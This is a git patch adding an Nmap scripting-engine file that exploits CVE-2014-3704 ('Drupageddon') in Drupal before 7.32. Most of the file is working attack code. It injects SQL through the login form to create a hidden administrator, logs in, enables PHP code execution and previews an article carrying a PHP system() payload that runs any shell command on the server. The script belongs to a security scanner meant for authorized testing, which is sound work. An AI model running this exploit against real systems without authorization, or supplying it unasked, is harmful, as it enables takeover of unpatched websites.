From 0d47952611198ef6b1163f366dc03922d20b1475 Mon Sep 17 00:00:00 2001
From: Daniel Baumann <daniel.baumann@progress-linux.org>
Date: Wed, 17 Apr 2024 09:42:04 +0200
Subject: Adding upstream version 7.94+git20230807.3be01efb1+dfsg.

Signed-off-by: Daniel Baumann <daniel.baumann@progress-linux.org>
---
 scripts/http-vuln-cve2014-3704.nse | 430 +++++++++++++++++++++++++++++++++++++
 1 file changed, 430 insertions(+)
 create mode 100644 scripts/http-vuln-cve2014-3704.nse

(limited to 'scripts/http-vuln-cve2014-3704.nse')

diff --git a/scripts/http-vuln-cve2014-3704.nse b/scripts/http-vuln-cve2014-3704.nse
new file mode 100644
index 0000000..2091a90
--- /dev/null
+++ b/scripts/http-vuln-cve2014-3704.nse
@@ -0,0 +1,430 @@
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local string = require "string"
+local table = require "table"
+local url = require "url"
+local vulns = require "vulns"
+local openssl = require "openssl"
+local rand = require "rand"
+
+description = [[
+Exploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions < 7.32
+of Drupal core are known to be affected.
+
+Vulnerability allows remote attackers to conduct SQL injection attacks via an
+array containing crafted keys.
+
+The script injects new Drupal administrator user via login form and then it
+attempts to log in as this user to determine if target is vulnerable. If that's
+the case following exploitation steps are performed:
+
+* PHP filter module which allows embedded PHP code/snippets to be evaluated is enabled,
+* permission to use PHP code for administrator users is set,
+* new article which contains payload is created & previewed,
+* cleanup: by default all DB records that were added/modified by the script are restored.
+
+Vulnerability originally discovered by Stefan Horst from SektionEins.
+
+Exploitation technique used to achieve RCE on the target is based on exploit/multi/http/drupal_drupageddon Metasploit module.
+]]
+
+---
+-- @see http-sql-injection.nse
+--
+-- @usage
+-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" <target>
+-- nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false <target>
+--
+-- @output
+-- PORT   STATE SERVICE REASON
+-- 80/tcp open  http    syn-ack
+-- | http-vuln-cve2014-3704:
+-- |   VULNERABLE:
+-- |   Drupal - pre Auth SQL Injection Vulnerability
+-- |     State: VULNERABLE (Exploitable)
+-- |     IDs:  CVE:CVE-2014-3704
+-- |       The expandArguments function in the database abstraction API in
+-- |       Drupal core 7.x before 7.32 does not properly construct prepared
+-- |       statements, which allows remote attackers to conduct SQL injection
+-- |       attacks via an array containing crafted keys.
+-- |
+-- |     Disclosure date: 2014-10-15
+-- |     Exploit results:
+-- |       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
+-- |     References:
+-- |       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
+-- |       https://www.drupal.org/SA-CORE-2014-005
+-- |       http://www.securityfocus.com/bid/70595
+-- |_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704
+--
+-- @args http-vuln-cve2014-3704.uri Drupal root directory on the website. Default: /
+-- @args http-vuln-cve2014-3704.cmd Shell command to execute. Default: nil
+-- @args http-vuln-cve2014-3704.cleanup Indicates whether cleanup (removing DB
+--                                      records that was added/modified during
+--                                      exploitation phase) will be done.
+--                                      Default: true
+---
+
+author = "Mariusz Ziulek <mzet()owasp org>"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"vuln", "intrusive", "exploit"}
+
+portrule = shortport.http
+
+--- Appends a new multipart/form-data part to a table
+local function multipart_append_data(r, k, data, extra)
+  r[#r + 1] = string.format("content-disposition: form-data; name=\"%s\"", k)
+  if extra.filename then
+    r[#r + 1] = string.format("; filename=\"%s\"", extra.filename)
+  end
+  if extra.content_type then
+    r[#r + 1] = string.format("\r\ncontent-type: %s", extra.content_type)
+  end
+  if extra.content_transfer_encoding then
+    r[#r + 1] = string.format("\r\ncontent-transfer-encoding: %s", extra.content_transfer_encoding)
+  end
+  r[#r + 1] = string.format("\r\n\r\n%s\r\n", data)
+end
+
+--- Creates multipart/form-data message as defined in RFC 2388
+local function multipart_build_body(content, boundary)
+  local r = {}
+  local k, v
+  for k, v in pairs(content) do
+    r[#r + 1] = string.format("--%s\r\n", boundary)
+    if type(v) == "string" then
+      multipart_append_data(r, k, v, {})
+    elseif type(v) == "table" then
+      if v.data == nil then return nil end
+      local extra = {
+        filename = v.filename or v.name,
+        content_type = v.content_type or v.mimetype or "application/octet-stream",
+        content_transfer_encoding = v.content_transfer_encoding or "binary",
+      }
+      multipart_append_data(r, k, v.data, extra)
+    else
+      return nil
+    end
+  end
+
+  r[#r + 1] =  string.format("--%s--\r\n", boundary)
+  return table.concat(r)
+end
+
+local function extract_CSRFtoken(content)
+  local pattern = 'name="form_token" value="(.-)"'
+  local value = string.match(content, pattern)
+  return value
+end
+
+local function itoa64(index)
+  local itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
+  return string.sub(itoa64, index + 1, index + 1)
+end
+
+local function phpass_encode64(input)
+  local count = #input + 1
+  local out = {}
+  local cur = 1
+
+  while cur < count do
+    local value = string.byte(input, cur)
+    cur = cur + 1
+    table.insert(out, itoa64(value & 0x3f))
+
+    if cur < count then
+      value = value | (string.byte(input, cur) << 8)
+    end
+    table.insert(out, itoa64((value >> 6) & 0x3f))
+
+    if cur >= count then
+      break
+    end
+    cur = cur + 1
+
+    if cur < count then
+      value = value | (string.byte(input, cur) << 16)
+    end
+    table.insert(out, itoa64((value >> 12) & 0x3f))
+
+    if cur >= count then
+      break
+    end
+    cur = cur + 1
+
+    table.insert(out, itoa64((value >> 18) & 0x3f))
+  end
+
+  return table.concat(out)
+end
+
+local function gen_passwd_hash(passwd)
+  local iter = 15
+  local iter_char = itoa64(iter)
+  local iter_count = 1<<iter
+  local salt = rand.random_alpha(8)
+
+  local md5 = openssl.md5(salt .. passwd)
+  for i = 1, iter_count do
+    md5 = openssl.md5(md5 .. passwd)
+  end
+
+  local dgst = phpass_encode64(md5)
+  local h = '$P$' .. iter_char .. salt .. string.sub(dgst, 0, 22)
+  return h
+end
+
+local function do_sql_query(host, port, uri, user)
+
+  local adminRole = 'administrator'
+  local sql_user
+  local sql_admin
+  local passwd
+  local email
+  local passHash
+  local query
+
+  if user == nil then
+    user = rand.random_alpha(10)
+    passwd = rand.random_alpha(10)
+    passHash = gen_passwd_hash(passwd)
+    email = rand.random_alpha(8) .. '@' .. rand.random_alpha(5) .. '.' .. rand.random_alpha(3)
+
+    stdnse.debug(1, string.format("adding admin user (username: '%s'; passwd: '%s')", user, passwd))
+    sql_user = url.escape("insert into users (uid,name,pass,mail,status) select max(uid)+1,'" .. user .. "','" .. passHash .. "','" .. email .. "',1 from users;")
+
+    sql_admin = url.escape("insert into users_roles (uid, rid) VALUES ((select uid from users where name='" .. user .. "'), (select rid from role where name = '" .. adminRole .. "'));")
+
+    query = sql_user .. sql_admin
+  else
+    stdnse.debug(1, string.format("removing admin user (username: '%s')", user))
+
+    sql_user = url.escape("delete from users where name='" .. user .. "';")
+
+    sql_admin = url.escape("delete from users_roles where uid=(select uid from users where name='" .. user .. "');")
+
+    query = sql_admin .. sql_user
+  end
+
+  local r = "name[0;" .. query .. "#%20%20]=" .. rand.random_alpha(10) .. "&name[0]=" .. rand.random_alpha(10) .. "&pass=" .. rand.random_alpha(10) .. "&form_id=user_login&op=Log+in"
+
+  local opt = {
+    header = {
+      ['Content-Type'] = "application/x-www-form-urlencoded"
+    }
+  }
+  local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
+
+  if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
+    return user, passwd
+  end
+
+end
+
+local function set_php_filter(host, port, uri, session, disable)
+
+  -- enable PHP filter
+  if not disable then
+    stdnse.debug(1, "enabling PHP filter module")
+  else
+    stdnse.debug(1, "disabling PHP filter module")
+  end
+
+  local opt = {}
+  opt['cookies'] = session.name ..'='.. session.value
+
+  local res = http.get(host, port, uri .. "?q=/admin/modules", opt)
+  if res == nil then return nil end
+
+  local csrfToken = extract_CSRFtoken(res.body)
+
+  local enabledModulesPattern = 'name="([^"]*)" value="1" checked="checked" class="form%-checkbox"'
+  local data = {}
+  for m in string.gmatch(res.body, enabledModulesPattern) do
+    data[m] = 1
+    if disable and m == 'modules[Core][php][enable]' then
+      data[m] = nil
+    end
+  end
+
+  if not disable then
+    data['modules[Core][php][enable]'] = 1
+  end
+  data['form_token'] = csrfToken
+  data['form_id'] = 'system_modules'
+  data['op'] = 'Save configuration'
+  res = http.post(host, port, uri .. "?q=/admin/modules/list/confirm", opt, nil, data)
+  if res == nil then return nil end
+
+  return true
+end
+
+local function set_permission(host, port, uri, session, disable)
+
+  -- allow Administrator to use php_code
+  if not disable then
+    stdnse.debug(1, "setting permissions for PHP filter module")
+  else
+    stdnse.debug(1, "restoring permissions for PHP filter module")
+  end
+
+  local opt = {}
+  opt['cookies'] = session.name ..'='.. session.value
+
+  local res = http.get(host, port, uri .. "?q=/admin/people/permissions", opt)
+  if res == nil then return nil end
+
+  local csrfToken = extract_CSRFtoken(res.body)
+
+  local enabledPermsRegex = 'name="([^"]*)" value="([^"]*)" checked="checked"'
+  local data = {}
+  for key, value in string.gmatch(res.body, enabledPermsRegex) do
+    data[key] = value
+    if disable and key == '3[use text format php_code]' then
+      data[key] = nil
+    end
+  end
+
+  if not disable then
+    data['3[use text format php_code]'] = 'use text format php_code'
+  end
+  data['form_token'] = csrfToken
+  data['form_id'] = 'user_admin_permissions'
+  data['op'] = 'Save permissions'
+  res = http.post(host, port, uri .. "?q=/admin/people/permissions", opt, nil, data)
+  if res == nil then return nil end
+
+  return true
+end
+
+local function trigger_exploit(host, port, uri, session, cmd)
+
+  local opt = {}
+  opt['cookies'] = session.name ..'='.. session.value
+
+  -- add new Content page & trigger RCE
+  stdnse.debug(1, string.format("%s", "creating new article page with planted payload"))
+
+  local res = http.get(host, port, uri .. "?q=/node/add/article", opt)
+  if res == nil then return nil end
+
+  local csrfToken = extract_CSRFtoken(res.body)
+
+  stdnse.debug(1, string.format("%s", "calling preview article page & triggering exploit"))
+  local pattern = '"' .. rand.random_alpha(5)
+  local payload = "<?php echo '" .. pattern .. " '; system('" .. cmd .. "'); echo '".. pattern .. " '; ?>"
+  local boundary = rand.random_alpha(16)
+  opt['header'] = {}
+  opt['header']["Content-Type"] = "multipart/form-data" .. "; boundary=" .. boundary
+
+  local files = {
+    ['title'] = 'title',
+    ['form_id'] = 'article_node_form',
+    ['form_token'] = csrfToken,
+    ['body[und][0][value]'] = payload,
+    ['body[und][0][format]'] = 'php_code',
+    ['op'] = 'Preview',
+  }
+  local body = multipart_build_body(files, boundary)
+
+  res = http.post(host, port, uri .. "?q=/node/add/article", opt, nil, body)
+  if res == nil then return nil end
+
+  return res.body, pattern
+end
+
+action = function(host, port)
+
+  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
+  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
+  local cleanup = nil
+  if stdnse.get_script_args(SCRIPT_NAME..".cleanup") == "false" then
+    cleanup = "false"
+  end
+
+  local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
+  local vuln = {
+    title = 'Drupal - pre Auth SQL Injection Vulnerability',
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+  The expandArguments function in the database abstraction API in
+  Drupal core 7.x before 7.32 does not properly construct prepared
+  statements, which allows remote attackers to conduct SQL injection
+  attacks via an array containing crafted keys.
+    ]],
+    IDS = {CVE = 'CVE-2014-3704'},
+    references = {
+      'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html',
+      'https://www.drupal.org/SA-CORE-2014-005',
+      'http://www.securityfocus.com/bid/70595',
+    },
+    dates = {
+      disclosure = {year = '2014', month = '10', day = '15'},
+    },
+  }
+
+  local user, passwd = do_sql_query(host, port, uri, nil)
+
+  if user == nil or passwd == nil then
+    return vulnReport:make_output(vuln)
+  end
+
+  stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
+
+  vuln.state = vulns.STATE.EXPLOIT
+
+  local data = {
+    ['name'] = user,
+    ['pass'] = passwd,
+    ['form_id'] = 'user_login',
+    ['op'] = 'Log in',
+  }
+
+  local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
+
+  if res.status == 302 and res.cookies[1].name ~= nil then
+
+    stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
+
+    if cmd ~= nil then
+      local session = {}
+      session.name = res.cookies[1].name
+      session.value = res.cookies[1].value
+
+      set_php_filter(host, port, uri, session, false)
+
+      set_permission(host, port, uri, session, false)
+
+      local resp_content, pattern = trigger_exploit(host, port, uri, session, cmd)
+
+      local cmdOut = nil
+      for m in string.gmatch(resp_content, pattern .. '([^"]*)' .. pattern) do
+        cmdOut = m
+        break
+      end
+
+      if cmdOut ~= nil then
+        vuln.exploit_results = cmdOut
+      end
+
+      -- cleanup: restore permission & disable php filter module
+      if cleanup == nil then
+        set_permission(host, port, uri, session, true)
+        set_php_filter(host, port, uri, session, true)
+      end
+    end
+
+  else
+    vuln.state = vulns.STATE.LIKELY_VULN
+    vuln.check_results = "Account created but unable to log in."
+  end
+
+  -- cleanup: remove admin user
+  if cleanup == nil then
+    do_sql_query(host, port, uri, user)
+  end
+
+  return vulnReport:make_output(vuln)
+
+end
-- 
cgit v1.2.3